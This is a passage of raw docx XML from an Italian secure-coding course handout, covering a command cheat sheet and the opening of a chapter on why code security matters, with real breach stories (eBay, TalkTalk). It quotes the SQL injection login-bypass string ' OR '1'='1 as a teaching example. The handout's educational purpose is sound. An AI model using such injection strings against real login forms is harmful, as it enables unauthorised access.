        <w:t xml:space="preserve">e l’ho avviata almeno una volta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐ So aprire i DevTools del mio browser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl --version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">risponde</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se tutte le caselle sono spuntate, sei pronto per il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="65"/>
    <w:bookmarkStart w:id="66" w:name="X0f6b4c23bb6fd7d1019e1b6a47c930bbdb2b4ea"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="452" w:name="sec_0_14"/>
      <w:r>
        <w:t xml:space="preserve">0.14 Riferimento veloce — i comandi che userai in continuazione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="452"/>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Comando</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cosa fa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">python nome_file.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Esegue uno script Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pip install nome_libreria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Installa una libreria nell’ambiente virtuale attivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pip list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mostra le librerie installate nell’ambiente attivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pip install -r requirements.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Installa tutte le librerie elencate nel file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mostra in quale cartella ti trovi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ls</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Win: anche</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">dir</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mostra i file nella cartella corrente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">cd cartella</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Entra nella cartella</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">cd ..</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Torna alla cartella superiore</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.\venv\Scripts\Activate.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attiva l’ambiente virtuale (Windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">source venv/bin/activate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attiva l’ambiente virtuale (macOS/Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">deactivate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Esce dall’ambiente virtuale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">git clone &lt;url&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Scarica un progetto da un repository remoto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Ctrl + C</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(nel terminale)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ferma il programma in esecuzione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Ctrl + S</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(in VS Code)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Salva il file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">F12</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(nel browser)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Apre i DevTools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stampa questa tabella e tienila accanto al monitor le prime settimane: ti risparmierà parecchio tempo perso a chiederti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come si faceva quel comando?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Prossimo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Perché la sicurezza riguarda chi scrive codice.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Adesso che l’ambiente è pronto, possiamo iniziare a parlare di sicurezza.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="66"/>
    <w:bookmarkEnd w:id="67"/>
    <w:bookmarkStart w:id="84" w:name="X56389da94577f07391a012ab54ec9ba3f4279c0"/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="453" w:name="ch_1"/>
      <w:r>
        <w:t xml:space="preserve">Capitolo 1 — Perché la sicurezza riguarda chi scrive codice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="453"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa devi sapere prima di leggere questo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nulla. È il punto di partenza.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="68" w:name="Xd2f7eaa1f811670006e14830415a716718d0a95"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="454" w:name="sec_1_1"/>
      <w:r>
        <w:t xml:space="preserve">1.1 Sicurezza informatica e sicurezza del codice non sono la stessa cosa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="454"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando si parla di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cybersecurity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la maggior parte delle persone pensa a firewall, antivirus, password robuste, VPN. Sono strumenti reali e utili, ma proteggono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">l’infrastruttura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la rete aziendale, i computer, i dati che viaggiano. Non proteggono il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">codice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che scrivi tu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un’analogia chiarisce il punto. Pensa a una banca:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sicurezza informatica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è la cassaforte nel caveau, le telecamere, le guardie all’ingresso, l’allarme antifurto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sicurezza del codice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è il fatto che lo sportellista, quando un cliente chiede</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">vorrei prelevare 500 euro dal conto di Mario Rossi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">verifichi che il cliente sia davvero Mario Rossi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prima di consegnare il denaro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una banca con caveau perfetto e sportellisti che non verificano l’identità verrà svuotata in un pomeriggio. E il caveau non c’entra nulla.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo stesso vale per il software. Puoi avere il firewall più costoso del mondo, ma se la tua applicazione web ha un errore nel codice che permette a un visitatore qualsiasi di leggere i dati di tutti gli altri utenti, il firewall non se ne accorge nemmeno: per lui è una richiesta come un’altra. Quell’errore è scritto da chi ha programmato l’applicazione — cioè da te, fra qualche anno o fra qualche mese.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il messaggio centrale è semplice:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Il compilatore controlla la sintassi. L’attaccante controlla la logica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">compilatore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(il programma che traduce il tuo codice in qualcosa che il computer sa eseguire — in Python il ruolo equivalente è svolto dall’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">interprete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) ti segnala se hai dimenticato un punto e virgola o sbagliato il nome di una variabile. Non ti segnala se la tua funzione di login si fa raggirare dalla stringa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(vedremo nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">capitolo 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> perché questa stringa è famosa). Quella è una verifica che spetta a te, programmatore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="68"/>
    <w:bookmarkStart w:id="74" w:name="cinque-casi-reali-raccontati-come-storie"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="455" w:name="sec_1_2"/>
      <w:r>
        <w:t xml:space="preserve">1.2 Cinque casi reali, raccontati come storie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="455"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I bug di sicurezza non sono questione accademica. Sono aziende che falliscono, persone licenziate, multe da decine di milioni di euro, dati personali di milioni di cittadini esposti su internet. Ecco cinque casi documentati. Leggili come storie, non come tecnicismi: nei prossimi capitoli vedremo esattamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono successi.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="69" w:name="ebay-2008-il-prezzo-era-nel-form"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">eBay, 2008 — Il prezzo era nel form</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un utente smaliziato si accorge che, durante l’acquisto di un oggetto su eBay, il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">prezzo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è scritto in un campo nascosto del modulo HTML, e viene inviato dal browser al server al momento dell’ordine. Modifica quel campo manualmente prima di inviare. Compra una console da 300 euro per 1 euro. Il server eBay accetta tranquillamente l’ordine e addebita 1 euro sulla carta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">errore di codice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il server si fidava di un dato che il browser dell’utente poteva modificare a piacimento. Vedremo questo schema (in inglese:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">parameter tampering</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">manomissione dei parametri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) molte volte nel corso.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="69"/>
    <w:bookmarkStart w:id="70" w:name="X62f299f1fcee84f8686d7f1449882740676efde"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TalkTalk, 2015 — Una SQL Injection da £400.000 di multa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TalkTalk è un grande operatore telefonico britannico. Un attacco di tipo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(oggetto del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">capitolo 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> di questa dispensa) su una pagina del loro sito espone i dati di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">circa 157.000 clienti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: nomi, indirizzi, email, date di nascita, dati bancari di circa 15.000 persone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’autorità britannica per la protezione dei dati (l’equivalente del Garante Privacy italiano) commina una multa di £400.000. Il valore in borsa di TalkTalk crolla. L’amministratrice delegata viene chiamata a testimoniare in parlamento. La vulnerabilità sfruttata era nota dal 2012 e mai corretta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
